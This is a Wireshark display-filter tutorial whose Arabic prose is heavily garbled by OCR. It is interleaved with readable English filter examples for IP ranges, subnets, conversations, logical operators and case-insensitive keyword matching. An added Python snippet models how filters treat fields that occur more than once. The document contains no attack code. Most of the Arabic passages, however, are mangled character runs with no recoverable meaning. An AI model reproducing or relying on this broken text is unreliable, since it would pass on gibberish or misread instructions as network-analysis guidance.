< mi tdii Uj) tcp. tij *jiiJi lW^ .^a^i ^u^&v ^ ^jisiai jusyi sj^i ^i^i^i ^ *j 

cJJ^i jii^i ^-ia^ ^^jujj jjoj ^IjLujjjI jll t tcp. analysis. "M-^ li) .^-^11 TCP ^jju^ <— a jjuj tiljUijjl jll ^jli 

4gVii^ ^^inn ^Sl ^-ja^ j^a J\ Jk. jSjII c^I^j .^U3I JUJI ^ <*bVlj TCP lS^I^ ^ J&\j TCP 























[Figure: after typing tcp.analysis. the auto-complete list offers tcp.analysis.ack_rtt, tcp.analysis.acks_frame, tcp.analysis.bytes_in_flight, tcp.analysis.duplicate_ack, tcp.analysis.duplicate_ack_frame, tcp.analysis.duplicate_ack_num and the other tcp.analysis fields]





https://www.facebook.com/tibea2004 



Display Filter Comparison Operators •

1. == or eq
Example: ip.src == 10.2.2.2
Display all IPv4 traffic from 10.2.2.2

2. != or ne
Example: tcp.srcport != 80
Display all TCP traffic from any port except port 80

3. > or gt
Example: frame.time_relative > 1
Display packets that arrived more than 1 second after the previous packet in the trace file

4. < or lt
Example: tcp.window_size < 1460
Display when the TCP receive window size is less than 1460 bytes

5. >= or ge
Example: dns.count.answers >= 10
Display DNS response packets that contain at least 10 answers

6. <= or le
Example: ip.ttl < 10
Display any packets that have less than 10 in the IP Time to Live field

7. contains
Example: http contains "GET"
Display all the HTTP client GET requests sent to an HTTP server
^jj <ji ^jjj lil tjliall L5 lc .TCP J] Vn i n^ l cjLLfkill s jfik ^ (comparison operators) ^ jlUI lW ^l^iuit 

.tcp.port == 80 tifc-J! lU^ 4-^UJI HTTP jj^l ^ 

.(Operator) lW-*-^! ls^-^ '^-^-^ Ait^l ^1 ^l^aJ V c±j| ;<ia j^i* 
ip.src==10.2.2.2 works the same as ip.src == 10.2.2.2 



(Use Expressions to Build Display Filters) u^j^l jdi f Expression Jl ^l^l^l • 

<aJaio ( . uLaj ^^joLjjj]! CjIj^VI -^j^j <^c- Expression jjll c3j* j^I '^ls^ l^I l^j 

-jjuj) 5-ajU3! <Jaii3l tills Jl JUliVlj L*%* ^ill J j£ jjjjJI jl (j-nlalll ^'^j 'Filter Expression ^Ljj J .Sjiilill 

.AaAlall Cjtatk^l ^ jj SMB <y->jH ^ c>j"SMB" c^Jtill J£JJ! J . JSaJ! 

. (comparison operators)^ lU^ AiL-^V J field existence filter H W^-^^l Relation j^l 
ill Jc J jlaJI ^ V a <>m^U .ai^ ^ill Jq^ 1] aAjslA] ^jill ,a§ ^Filter Expression s^-j o-* o*^' 

. smb.nt_status UU2 

o^^u ^jUj^ljll predefined value * STATUS_SUCCESSj Relation S =! smb.nt_status UjfcJ 
jSj <J ^1 ^jil ^ 6 != lU«1I U j^I .£^1 J) NT Status J ^1 ^ j 0x0 

jjl) jiill -L> ^ j*it 411^ ^ smb.nt_status != 0x0 j^^l j^l 4 jalj-a Jja jto 

. jj^JI ^ j^ill Apply 
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Kg =.nb-jDir IS"] jrc-spny 










[Screenshot: Wireshark Filter Expression dialog (Profile: Default) with the SMB field smb.nt_status (NT Status code) selected, relation != and the predefined value STATUS_SUCCESS (0x0)]



Filter jjll cij* H «j lSj^' ; ^Uaj *LijV c ^jJaljjaVI Lpa^l <sL^\ o^j^ 

j± jA\ j&k oiaU jjal t*Ui j (^5-^ jll cj! j^Vl -^j^ ^) Display Filter j j J^' j' (o^ j*^ Alki* jLuj ^ %± jJI) 

.^jjjl^JI jjIa ajjj] JUJI jJiij .4? o- 3 ^^ 



[Screenshot: Wireshark Display Filter dialog listing the saved default filters (Ethernet address, Ethernet type, Ethernet broadcast, IP only, IP address, UDP port isn't 53 (not DNS), TCP or UDP port is 80 (HTTP), HTTP, No ARP and no DNS, Non-HTTP and non-SMTP) with Filter name and Filter string fields, over a packet list of DNS and LDAP frames]

j >t 4L ^UJI ^Uali V ^Ij ^ ajJ Ethernet and IP host .c^ 3 ^^^ lP 3 ^^ ^^^^^ Iji^ 
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_4_Ia jQ^ *\\ q^jxI] jJ^li <iLjaj Al jfruiJ <^<< «j jjaiJ tiL <j^aLaJI JJ^>^ I JJ^S (j^f^ 

fj\ Vjl <4? ^UJI dfilters * «M j*^ .(J^l ^ ^->^ j' 6 jSUIl uklj jj^UII AiUbV) 

. (Status Bar)^^ -^j^ i> oV^' ( y?^^ ^j*^' ^ . < S^ C - (Profile File) <-*L>*^l ^ 

About Wireshark t>j V-^j^ ^ helps <ija jfclW ^"Default" ^ j^Aj 

^ J uj^ ^ dfilters .Personal Configuration folder hyperlink ^V^l <ija Uj.a> I jfc jftil ^ Folders 
4^UJI Personal Configuration folder ^ cj|j]a±JI U oij ^1 4 (Profile File) ^j* 2 ^ Wi .. n lij .^kJI 

(J^l^lt (j-a .^tla d flLa <J^ c^*^ J Profile ^ ^1^1 j3 ^ cilUfc (jj^J A jjoj j .Profile ^> a\\ (JC- Cliaaj (jSlj 'tdj 

.dfilters LjLllJe. jk*ll 
(Filter Properly on HTTP Traffic) J***! HTTP ^ Sj^a j. 

tcp.port==xx (where xx denotes the HTTP port in use) 

TCP ^ fSj J^Jt jW^' • 

L yaj*l\ jjla (jjjinij UxS .ciljUijjl jll ^ <^uolj Jj-a^j c_ASa j www.wireshark.org ^ J^ajl j5l l^j^ c^^^ c aUll 

J£ 11a ^ j^l liA . Jtill J^Ji ^ ^ULL ^ill j^ill JjUj ^1 ^ jaJI J£ jll ^ cjl tcp.port==80 



[Screenshot: trace filtered with tcp.port==80; both HTTP and plain TCP frames are displayed. Callout: "The tcp.port==80 filter displays all our web browsing traffic as well as the TCP connection setup and management frames - NICE!"]

HTTP cjUUi^l jl j-lji t> c5j^ V ^jUijjl jJl .HTTP ^ j 'TCP u 1 ^j^j^ 1 j 31 J 

.TCP Vfril .a->1I jJ-j HTTP dissector ^ 

(TCP ACKs, FINs, RSTs, and the three-way TCP handshake are simply listed as TCP) 



jj^U L-±ui\ \a\\ jiilill j& 4<jLi^3l j 6 TCP cJ^^^ (jj*^^ c_ u£ lil 

JjSjSjjJI ^ ^ HTTP c> cr 131 fj^ 1 ^ 13*353 
.TCP ^ 5^ s^V TCP preference & ^ ^ c^l jlL! 12 ^ ^ tij 
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fife fccf* V£«*wr So Rapture Ana^t StatiUKrs T^lrphony Taoh tnC™^^ Hrip 

[Screenshot: the same trace filtered with http; only HTTP/1.1 200 OK and HTTP Continuation frames are listed. Callout: "The http filter displays 13,353 packets"]

.http liA e I^L,U TCP <> UlJ^I ^ jjij J 

a£ di^ll ^jjal jjaVI jflill liA jjj^j ^ jiull .http J* HTTP JJJ-*U ^ ^U^' «-*u£U 

iiiall ^ axuxj HTTP 
J^u V ^ DHCP j^liUJjjJau 4. 

ci j*j J iia .BOOTP c> ^ DHCP ^ j^VI ujP IPv4 ^ ^ DHCP c> 0*&** 



[Screenshot: a DHCP trace with dhcp typed in the Filter field; the field background is red and the status bar reports: Invalid filter: "dhcp" is neither a field nor a protocol. Callout: "The display filter will never work if Wireshark's error-detection changes this field background to red."]

(Bootstrap Protocol) BOOTP ^ DHCP lUj V j^ill Ija ^^CP f> J^jj^i J t> ^ J 31 c> 

dhcpv6 ^i^i^l t^lSi tilj^Qj cDHCPv6 jjj^^ ^ ^) .bootp gr* lP 3 j* 3 ^ ^j^ > ^ 1 3 *j > ^ 1 lit 

(BOOTP DHCPv6 oV) 

AaC 4Sjnilt jl c^jUaJl ^ ^ J-4^-d cIP (jl UUIujI jla jj^i ^jjjhl i^. 

C^J^ 1 (IP address display filters) IP o^j^ J 15 ^ o^ 1 jj^^ ^ J^j^ lP 3 ^^ j 15 ^ 

.(Subnet) ^j^^ ^f^t jl 

ipv6.addr j 'ipv6.host 'ipv6.dst < ipv6.srcj IPv4 ip.addrj 'ip.host 'ip.dst 'ip.src Jj^Jl <^^i ^^Luj lJj^ 
J 'ipv6.src 'ip.dst <ip.src c^ 1 ^ ^ ^ J>^ ^ IP u>j^ ^ JA\ <j! i^V . IPv6 jj^ 

•f ^j 15 ^ipv6.addr jip.addr jipv6.host j ip.host Jj^Jl <^^1 .ipv6.dst 
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( *u*a fjj fj\ l^iaa. jj ^ ^1 IPv6 ul?^ J IPv4 ojj^ c> ipv6 host filters j ip.host J 

ip.addr==[address] .IPv4/IPv6 destination u*j^ jl IPv4/IPv6 source u'j^ 
lWI J IPv4/IPv6 source address JkJI t> l£ ^ IPv4/IPv6 ojj^ t> ipv6.addr==[address]j 

.IPv4/IPv6 destination address 

- Example: ip.addr==10.3.1.1
Display frames that have 10.3.1.1 in the IP source address field or the IP destination address field

- Example: !ip.addr==10.3.1.1
Display all frames except frames that have 10.3.1.1 in the IP source address field or 10.3.1.1 in the IP destination address field

- Example: ipv6.addr==2406:da00:ff00::6b16:f02d
Display all frames to or from 2406:da00:ff00::6b16:f02d

- Example: ip.src==10.3.1.1
Display traffic from 10.3.1.1

- Example: ip.dst==10.3.1.1
Display traffic to 10.3.1.1

- Example: ip.host==www.wireshark.org
Display traffic to or from the IP address that resolves to www.wireshark.org

(range of address) l^j^I <> <> j' <J\ JJJ^ • 

ijj^ ? jaJI cp && (^laLJ! Jx»UJIj > j! < <j J1A\ JJjc ipv6.addr J ip.addr ^l^lual t*LLaj 

- Example: ip.addr > 10.3.0.1 && ip.addr < 10.3.0.5
Display traffic to or from 10.3.0.2, 10.3.0.3 or 10.3.0.4

- Example: (ip.addr >= 10.3.0.1 && ip.addr <= 10.3.0.6) && !ip.addr==10.3.0.3
Display traffic to or from 10.3.0.1, 10.3.0.2, 10.3.0.4, 10.3.0.5 or 10.3.0.6; the IP address 10.3.0.3 is excluded from the range specified

- Example: ipv6.addr >= fe80:: && ipv6.addr < fec0::
Display traffic to or from IPv6 addresses beginning with 0xfe80 through 0xfec0

(IP Subnet) "<p jM <> ji J>\ JJ>^ ^J* • 
liA ^^kiay .ip.addr J^l ^ (Classless Interdomain Routing) CIDR <^ jl\ i£+s&\ <A&u 

,JP (jl jie (j» e-j^ CjUill J-lc. jjjoij (^^Ij 4a^.V(\) aIjLh Aiaj^ij kc jfLo IP <jl jic- J^imjjll 

- Example: ip.addr==10.3.0.0/16 

Display traffic that contains an IP address starting with 10.3 in the source IP address field or destination IP 
address field 

- Example: ip.addr==10.3.0.0/16 && !ip.addr==10.3.1.1 

Display traffic that contains an IP address starting with 10.3 in the source IP address field or destination IP 
address field except 10.3.1.1 

- Example: !ip.addr==10.3.0.0/16 && !ip.addr==10.2.0.0/16 

Display all traffic except traffic that contains an IP address starting with 10.3 or 10.2 in the source IP 
address field or destination IP address field 

Quickly Filter on a Field in a Packet *t 

J ckj^ JjjL ^ L^ii cj\ '(particular characteristic) o^L^. ^ jjj^ Cf- 

Cy^\ ji^l ^Ia^j ujLj jl i Apply tjj^ ^ j o^j*^ 4j> Cy* ^ji^ • JJ > ^ j^ 1 ^ 



jl (jjall j^la (JfSajj Lib ^ill) Apply as Filter H j 4jj^aU> J JL*> ^1 jjja c>jVI <jjj jUJI jJj jiJI A'&a) 

.(^iiill t_aL UjUIj <3fkiJ V j 6^ ji^ 4lSaix» ^ jSlill <*-^ c^^l) Prepare a Filter 

Work Quickly-Use Right-Click I Apply as Filter - 
GET o-sVl j^lj HTTP ^1 ^ '8 jUaVI J^US ^>JI J^US ^ .^JUll JLill ^ < Jli*ll ^ 
^5 £y*j Apply as Filter <j^f^ Ljikl .(/) dujiiVI ajjoujjII 4^q>^l J^^j ^jj ^^kiu^ c^lj URI 

.Selected 



[Screenshot: right-clicking Request URI: / inside the GET / HTTP/1.1 frame (frame 8) and choosing Apply as Filter > Selected]

o^j^ Uj^ -t^' ci^A^ j (http.request.uri=='V v ) ^jLoJI lP 3 ^^ ^j^j^^ j^^ 



[Screenshot: the filter http.request.uri=="/" applied; frames 8 and 17, both GET / HTTP/1.1, are displayed]

U liA j . jjlflll Jj£ not ^ Uyu ( Liaj 4iLaUJ t^^xJl ^ HTTP C> t) 6 ^ ^IxjIojI s^jj lil 

^ojVI u^jUJI jJj (exclusion filter) ^ jM\ tiA ^Lij] Ljaji .(exclusion filter) lW^ 

.Not Selected ^ Apply as Filter ^Ij^VI ^i^ll GET 

not http.request.uri == "/"



Be Creative with Right-Click I Prepare a Filter - 

^ji ^jjj el n£ Lajj tcJlixJI cJ;^ ^^^ic .^jjiiaj ^jj ^ji JjS 4 auji gall -ja-viU j| jjla ^jjj U»^jc Prepare a filter ^l«^Luit 
J^k Prepare a Filter c>j lwVi ^jUJI j jj jiilU ^ . JPG^^ J j > ^^ W^ 3 ^ o- 21 ^ 1 ^] 

.Selected ^ c>jURI 

(i^aa V 4_&3 4^^x11 jj^la Ailai^ ^ http.request.uri== ? 7prod/scripts/mbox.js M ^ ^jUjjIjII 

^ia^ U£ .APPLY tija j^j ^ http.request.uri contains "jpg" ■ JJ^^ 
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313 0,000000 24.6,173.220 
[Screenshot: the filter http.request.uri contains "jpg" applied; frames 313, 326 and 402 are GET requests for .jpg files under /prod/assets/]

Right-Click Again to use the "..." Filter Enhancements

j^a Cjljlrk <xjjI ^jj lJj^ tdjli 6 Prepare a Filter j Apply as Filter iW^ j j*^ ^ 
jjlil! ^ ^illj http.request.uri M Jl V < Jl^ll li* ^ .JUll JiUI ^ jA L£ j ^Ij ^jJ 

. go.espn.comc> £^ u' ^ lp^j'JPG" 



[Screenshot: with tcp.port==80 already applied, right-clicking Request Method: GET in frame 313 opens the Apply as Filter / Prepare a Filter submenu with Selected, Not Selected, ... and Selected, ... or Selected, ... and Not Selected and ... or Not Selected]

.jlSJI ^ tcp.port==80 J*iiU UjJ jl£ lij JdJ& ^aL^VI <ii jll fl.wU ^ ^ ^Ull 

- Right-click on Request Method: GET and choose Selected
Filter created: http.request.method == "GET"
This will replace the current display filter and display all HTTP packets that contain the GET request method.

- Right-click on Request Method: GET and choose Not Selected
Filter created: !(http.request.method == "GET")
This will replace the current display filter and display any packets except HTTP packets that contain the HTTP GET request method.

- Right-click on Request Method: GET and choose ... and Selected
Filter created: (tcp.port==80) && (http.request.method == "GET")
This will display packets to or from port 80 that contain the HTTP GET request method.

- Right-click on Request Method: GET and choose ... or Selected
Filter created: (tcp.port==80) || (http.request.method == "GET")
This will display packets to or from port 80 as well as any HTTP packets that contain the GET request method. For example, if your HTTP traffic uses port 81, you will still see all the HTTP GET requests from that traffic.

- Right-click on Request Method: GET and choose ... and Not Selected
Filter created: (tcp.port==80) && !(http.request.method == "GET")
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This will display all traffic to or from port 80, but not any HTTP packets on that port that contain the GET 
request method. 

- Right-click on IP Source Address 10.2.2.2 and choose ... or Not Selected
Filter created: (tcp.port==80) || !(ip.src==10.2.2.2)
This will display packets to or from port 80 or any traffic that is not from 10.2.2.2

Filter on a Single TCP or UDP Conversation ± 
IiLujj conversation ."conversation" ^ t^UJI 4_iLc j JjLuJI o£ lP^jVI 

c aj£ <ijjt-<J j .conversation o^^Si £f"^ c ^ lSj^j y^-c- .^Lkll 4jUr. j cJ^*-^ l3jj^ m\a\\ ^ISjI j IP (jjjUc 

.^UVI 4c- jju^ Jjia^ll 4_iLc c&j*j yi L$j conversation * jSla j ^j^j <c jjuij 
. ^iiill ud* ^> s^lj UDPj> TCP W conversation jij^V cij^ yr* M 31 ' H 1 ^ 1 
P >II **A5 ^ TCP J UDP P > <iji l^VI o-jUl jjt J^h d& UDP/TCP conversation £»>^V -1 

.[TCP|UDP] fS Conversation Filter J^l fS ,>j 
P >II ^li ^ TCP J UDP e> <ij* lwVi o-jUI jj^ j^W ^ UDP/TCP conversation -2 

Follow [TCP|UDP] Stream jl^l fS ,>j 
.Conversations j^J ^ i>j Statistics <ija t> ^U^W i> conversation jrlj^V -3 

.(TCP o^j ^ Stream index number TCP conversation -4 

Use Right-Click to Filter on a Conversation • 



[Screenshot: right-clicking frame 508 (GET /prod/assets/tabs...) in the packet list opens a menu with Apply as Filter, Prepare a Filter, Conversation Filter, Colorize Conversation, SCTP and Follow TCP Stream]


Use Right-Click to Follow a Stream 



[Screenshot: Follow TCP Stream window for the conversation between 24.6.173.220 and 199.181.132.250, showing the GET / HTTP/1.1 request with its Accept, Accept-Language and User-Agent headers; the packet list behind it shows the handshake, the GET and the HTTP/1.1 301 Moved Permanently response]
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Filter on a Conversation from Wireshark Statistics • 
J] \c i jjsj Conversations ^ i>j Statistics j*' t> 

^ Conversations siaU <> cfjUl yr* Jj^Asj^ s-yjftfl cjU^ ^ yi\ .Conversations 

.l^j ci& ^1 Conversations 

Colorize J 'Find a Packet 'Prepare a Filter 'Apply as Filter Conversations ^ c>jVI j jJW jl>l 

. Conversation 

^ J 5 ^ <C5^ <-£^ yr* ■ ^ f^^3 s ^ o^*-? 'Prepare a Filter J Apply as Filter ^ 
i> L5^Vl iiaUxll ^ <>jVi Sjtill j J>^ j^W f .fjM ^jac- <J^ ^ Statistics I Conversations 

. Ajj^alS i "Any" ^1 j^j jt ^UJVI ^j^il jUl^l L^l .Selected ^ i>j Apply as Filter ^ 
.A ^i<Jlj A "A" ^ c^^l sa^Vi l£ "A" ^AU^a jli <TCP j UDP MOf^ CjU^ 

ip.addr==24.6.173.220 && tcp.port==19996 



[Screenshot: Statistics > Conversations window, TCP tab; right-clicking a conversation row offers Apply as Filter, Prepare a Filter, Find Packet and Colorize Conversation, each with Selected, Not Selected, ... and Selected, ... or Selected, ... and Not Selected, ... or Not Selected, and a direction choice among A <-> B, A -> B, A <- B, A <-> Any, A -> Any, A <- Any, Any <-> B, Any -> B and Any <- B]

j "A" Lj-S l) 2 ^ (> ^J 21 Statistics I Endpoints windows <> ^l^Sf) cj(jkaJ) Lili dll^j : 4Jajal4 

Filter on a TCP Conversation Based on the Stream Index Field • 
6g JUJ! J£^l .TCP conversation ^UijV Stream Index ti> o^jVl ^ jUJ! j J>j U^l 'TCP o> jjj 
^Uijj Uj^lj 'Apply as Filter j^tj Stream Index J^Ji ^ t>/^ jjh j^^j ^ <^j^3i U\l^\ TCP cj^b t^j^ ^ 

.tcp.stream==2 cPVIS conversation 



[Screenshot: frame 941 (GET /prod/assets/...) with the Transmission Control Protocol section expanded; the Stream index field is the one to right-click and Apply as Filter > Selected]


Expand Display Filters with Multiple Include and Exclude Conditions •

fr^ll HTTP Request URI ^ ".exe' jHTTP Request Method ^ GET c> 

. (logical operator)^^^^ cUl^Ji ^l^ki^U o^j^^ 
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Use Logical Operators • 

&& or and
Example: ip.src==10.2.2.2 && tcp.port==80
View all IPv4 traffic from 10.2.2.2 that is to or from port 80

|| or or
Example: tcp.port==80 || tcp.port==443
View all TCP traffic to or from ports 80 or 443

! or not
Example: !arp
View all traffic except ARP traffic

!= or ne
Example: tcp.flags.syn != 1
View TCP frames that do not have the TCP SYN flag (synchronize sequence numbers) set to 1

?ip.addr != jSlaJt ^ V IjU) • 

Incorrect: ip.addr != 10.2.2.2 

^ .IP destination address J j' IP source address J 10.2.2.2 u'j^ 1 V Jll <*>J1 lP 3 ^ 'V 
)iA .4_*>J! o^j^ ^ 'IP destination address Jj^ J IP source address Jj^ J 10.2.2.2 u'j^- 

^^Jl bjfilLi V t—fl jjuj j cor ^'^*1>»J 

Correct: !ip.addr == 10.2.2.2

^ .IP destination address J J IP source address J 10.2.2.2 u'j^' V Jll ^>J! lP 3 ^ 'V 

?!tcp.flags.syn==1 j^ll J«j V I iUl • 

ciLj] ^jSj ^3 Jit TCP ^ O^J^ ^— ^ li) .LaLaj 1 - a (jjjJ L» 1 jj mi ... "=" ^ "!" ^jjaa£i <Aat* Jjj J Ijjj Ldjjc kaa 

-L Uu V jslill I* a li a SYN bit 

Incorrect: !tcp.flags.syn==1

UDP f > JS* 'ls >Vl JjSjSjjJI p > ".1 TCP SYN bit <J JJ> ^ j^" ^ ^ ^ 

.1 Jj TCP SYN bit u^^^^ ^ *u ijflill ^ jll ARPj 

Correct: tcp.flags.syn != 1

.0 Jj ^ J^ j SYN ^ J^ cs Jit TCP f f j*j ^ 

(Use Parentheses to Change Filter Meaning) jSttll J*-* j^U u-tjSSf) ^(^1^) 
. jjlill Jj Ja jj^j AiUiajj pLuijj jjc tiL ^aLiJI jj*!>U3l c^^*^ J^*^ (Parentheses) u^^ j^*^ ^ ^ ^ < Jc (Jj^j (jl ^ j>j 

:<JU3I (jia^xJI jj^la J ' J^ 

(tcp.port==80 && ip.src==10.2.2.2) || tcp.flags.syn==1
tcp.port==80 && (ip.src==10.2.2.2 || tcp.flags.syn==1)

^> J jVl ^Uj^JI c>aj^ C5 3 ) ^^V^ .80 J^ 10.2.2.2 c> o^j^ J jVl Jli^l J 

.( IPojjU^ J iiUJl p lS J c> jM\ o^u) TCP handshakes 
TCP l& c> JjVl ^>JI ^ ^^V^ -80 i^il J^ j*. i£ q± jc fjjjoi jiai Jlloll J 

.10.2.2.2 c>handshakes 
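The comparison, logical-operator and parentheses sections above all hinge on one rule: a field such as ip.addr or tcp.port occurs twice in a frame, and a comparison is true as soon as any occurrence satisfies it, while a frame without the field satisfies no comparison at all. The following is an added example that models that rule in Python; it is not Wireshark code, the frames are constructed, and the field names merely mirror Wireshark's.

```python
"""Model of how Wireshark evaluates display-filter comparisons on fields that
occur more than once in a frame (ip.addr, tcp.port) or not at all.

Added example, not Wireshark code. Frames are constructed dicts whose keys
mirror Wireshark field names; a field maps to every occurrence of it in the
frame, which is what makes `ip.addr != 10.2.2.2` behave unexpectedly.
"""
import operator
from typing import Callable, Dict, List

Frame = Dict[str, List[object]]      # field name -> all occurrences in the frame
Predicate = Callable[[Frame], bool]

_OPS = {"==": operator.eq, "!=": operator.ne, ">": operator.gt,
        "<": operator.lt, ">=": operator.ge, "<=": operator.le}


def cmp(field: str, op: str, value: object) -> Predicate:
    """`field op value`: true if ANY occurrence of the field satisfies the test.
    A frame that lacks the field never satisfies a comparison on it."""
    test = _OPS[op]
    return lambda f: any(test(v, value) for v in f.get(field, []))


def proto(name: str) -> Predicate:
    """A bare protocol or field name (e.g. `arp`, `http`): true if present."""
    return lambda f: name in f


def not_(p: Predicate) -> Predicate:
    return lambda f: not p(f)


def and_(a: Predicate, b: Predicate) -> Predicate:
    return lambda f: a(f) and b(f)


def or_(a: Predicate, b: Predicate) -> Predicate:
    return lambda f: a(f) or b(f)


def matching(pred: Predicate, frames: Dict[str, Frame]) -> List[str]:
    """Names of the constructed frames the filter would display."""
    return [name for name, f in frames.items() if pred(f)]


def ip_frame(src: str, dst: str, sport: int, dport: int, syn: int, **extra) -> Frame:
    """Build a constructed IPv4/TCP frame; ip.addr and tcp.port hold both ends."""
    f: Frame = {"ip.src": [src], "ip.dst": [dst], "ip.addr": [src, dst],
                "tcp.srcport": [sport], "tcp.dstport": [dport],
                "tcp.port": [sport, dport], "tcp.flags.syn": [syn]}
    f.update({k: [v] for k, v in extra.items()})
    return f


# Constructed sample capture (not from a real trace).
FRAMES: Dict[str, Frame] = {
    "http_from_10.2.2.2": ip_frame("10.2.2.2", "10.1.1.1", 40000, 80, 0, http=True),
    "syn_to_10.2.2.2": ip_frame("10.1.1.1", "10.2.2.2", 40001, 443, 1),
    "syn_to_web": ip_frame("10.1.1.1", "10.9.9.9", 40002, 80, 1),
    "arp": {"arp": [True]},            # no ip.* or tcp.* fields at all
}

# The "incorrect" and "correct" forms discussed above, side by side.
INCORRECT_EXCLUDE = cmp("ip.addr", "!=", "10.2.2.2")        # ip.addr != 10.2.2.2
CORRECT_EXCLUDE = not_(cmp("ip.addr", "==", "10.2.2.2"))    # !ip.addr == 10.2.2.2
INCORRECT_NO_SYN = not_(cmp("tcp.flags.syn", "==", 1))      # !tcp.flags.syn==1
CORRECT_NO_SYN = cmp("tcp.flags.syn", "!=", 1)              # tcp.flags.syn != 1

# Parentheses change the meaning of the same three terms.
PORT80 = cmp("tcp.port", "==", 80)
FROM_10222 = cmp("ip.src", "==", "10.2.2.2")
SYN = cmp("tcp.flags.syn", "==", 1)
GROUPED_LEFT = or_(and_(PORT80, FROM_10222), SYN)   # (tcp.port==80 && ip.src==10.2.2.2) || tcp.flags.syn==1
GROUPED_RIGHT = and_(PORT80, or_(FROM_10222, SYN))  # tcp.port==80 && (ip.src==10.2.2.2 || tcp.flags.syn==1)


if __name__ == "__main__":
    for label, pred in [("ip.addr != 10.2.2.2", INCORRECT_EXCLUDE),
                        ("!ip.addr == 10.2.2.2", CORRECT_EXCLUDE),
                        ("!tcp.flags.syn==1", INCORRECT_NO_SYN),
                        ("tcp.flags.syn != 1", CORRECT_NO_SYN),
                        ("(port80 && from) || syn", GROUPED_LEFT),
                        ("port80 && (from || syn)", GROUPED_RIGHT)]:
        print(f"{label:26} -> {matching(pred, FRAMES)}")
```

Note that `ip.addr != 10.2.2.2` still shows the frame sent by 10.2.2.2 (its other address satisfies the test) and `!tcp.flags.syn==1` shows the ARP frame, which has no SYN bit to inspect.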
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(jjlll jl ji^YI (JjUl ^ ^J^J^ Jfl ^ La ^jc t^jiajxll JJ^li ^ia^jI dj-gUlaII Jl ^Uxi jj£I q\ c*I&al LaKs 

<jl jll (jli tllxkll t a] .*1<l ^cjIjj bUloal c^jiajc. jjlfl Jc LkaJt t *^ ui&l 4jUr. ^jLujjjI jll .(jlajxll Jj!>li Alklo lie j-<^.VI 

.(what the heck?) j» <(ti^>«) j <(Uaa> Jc Jii) *t j^ ^^aj ^ j*ll jj^la iaJai* 4_iLk 

(Syntax Check) 5*^11 u^ai jULkl <> jjj^ll ^4 jSlill &i iilill • 

tiljUijjl jll t Apply jj^ c3j^ .(jP^VI cJ**3 j^ill lP 3 ^*-^ j-^^ Alkio ^-u^l Ldic 

"ip.addr=10.2.2.2" isn't a valid display filter: "=" was unexpected in this context

-L Pa jxll jj^lfl £_L^il L_L-a j J jj^JJ HELP ^ J^jI 

(Syntax Check) 5^11 u^ai jULkl <> ^UL jSIill if l^al ^illll • 

.(syntax checks) ^ o-^i Jc- bUiujI <J**j * j-*^ cs-**^ ' f ^J 1 u ^ lP 3 ^*-^ Alkio Ajila LgaIo 
Oj^i :LpUll HTTP ^VU^I u> ^ .http && udp Jftll ■" (logic check) u-^»" V ^jLS^Ijll 

AjV o^ai < C5 Skla JJC. jjlill liA jl <> ad jll Jc . jjtill li$l ^ jaJI t> fc\ (JjUaJJ .UDP 'TCP 

.(syntax check) i> 
jjiaJ ^ (Syntax Check) £^11 o**± c> l)5 cH*^ ^ilkl) • 

^1 ^jUill t^A^s ^ ^ ^-^j '(Syntax Check) J~£^\ jts^l j^lall jl ^^isu 1i$£ t jL-aVl lP 3 ^^ uj^ 

j^^ j j^^Ji c> IPv4 u'j^ J CP- ^-^^ ip.addr j^Aj 6 fc* ti^^Mj 

.4^j3!j j^iJI Jil iiialt f^j c#^^ tcp.port j^l J^j 

. ji^aVI uj^^ ^ lP 3 ^ 3 ^^ j?^* Aikid ^ tiljUijjl jll q\ ^ *L jll ^^Ic LdLdj JaxIoj ip.src != 10.2.3.1 

j jUlill 4^U^ ^2 (jX^a Ua^ (1) (jjjjl j-a^^I ^jjllb j^Jaj Q^ajxJl Jxa ^11 ^ Jjj ^11 1 Ic- jj^i jjSVI c_jUujVI ;Aia j^la 

t Jjt J^au ^jl j^VI Ojlll CjIj jSlill ^li cAj fbil! Cil jU U^a -( jla jxil 4jL^ f Uj ^> lalUlVI Ajllus ^liHuub (2) 

.djUijjIjll 

(Filter on a Keyword in a Trace File) ^ ^ S ± 

jlaVI (S^- 4-^- ^ l alo ^ "admin" l!^ ^ \^ ^ ^jc cli^jj ^jl l^ja ^Ij^j l_a jjoi c _^j3I CjlajVI 

.CfijLA 11a lS^ .Lowercase j> Uppercase ^iaJjuj d^ll ^HiJ aS J ji^ ^ jl <L£U 

Use contains in a Simple Keyword Filter through an Entire Frame • 
contains "admin" jU^VI tJlUI ^ . jLLYI plajt ^ ^ ^JSII c> c^ll (contains "string") jU^VI ^I^U 
.djjjjl s jjSai^ J^U. ^ dAjjiLVI (JjjI j iAlSU jUaVI (all in lower case) admin ^Loll c-i^JU ^jij jjuj 

Uu^-d (jj^i UiAic. jiilill 11a ^Viml el u£ lil 6^JHa3I J^f^ (_ 5 -l c ' .<ijl j 2^^" CP" ^ l—li^ _(J jjuo^ j <iajjoij jlila jA 11a 
www.admin.com ^ ^jj^ij^LJI ^jjjUII Uiajl ^aLoij ^ tiljli ^fxp L - ajj^II < . ^ > ^ cJ j^-^ ^ u ^ <J Ai^^ ^ Jaas 

.adminhandbook.pdf 

Use contains in a Simple Keyword Filter based on a Field • 

<J^b C-l^jj d±£ lij t JHftll ,4jil£lt ^cjllill ^13 <j ^\ a\\ Jl^JI C5 lc Sjlaj ptall ^J^aI jjlal! pUj ^ 

^AaJLauiH ^jojI (_^JJ ^— S JJUJ tdjli j^Jl (J J > <al 9J J^^W FTP ^j^- J ^^JLuiaI! ^jojI ^ jfi^ ^11 J FTP <J 

jSlill ^ <LLu^ cil^j . JU1I ^ 4JU1I j*L& ftp.request.arg lMI ^ FTP 

ftp.request.arg contains "admin" 

.FTP ^ "admin" c> 
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No Twne Soui^e Dfc£tirtM»«i Protocol Into 

[Screenshot: frame 6, FTP Request: USER anonymous, from 192.168.0.101 to 10.251.30.69, with the File Transfer Protocol section expanded to show Request command: USER and its argument]

• Use matches and (?i) in a keyword filter for upper case or lower case strings

Suppose you want to find Admin whether it is written in upper case or lower case. `contains` is not enough for this: ftp.request.arg contains "admin" and ftp.request.arg contains "Admin" match different strings, and joining the two with a logical operator still does not cover every mix of case. Wireshark's `matches` operator uses Perl-Compatible Regular Expressions (PCRE), so a regular expression can describe the match you want; the modifier `(?i)` at the start of the expression makes the match case-insensitive.

To find "admin" in the FTP argument field in any combination of upper and lower case, use:

ftp.request.arg matches "(?i)admin"

Regular expressions also support character classes in square brackets. For example, suppose you want to match both of the following strings:

buildingAeng
buildingaeng

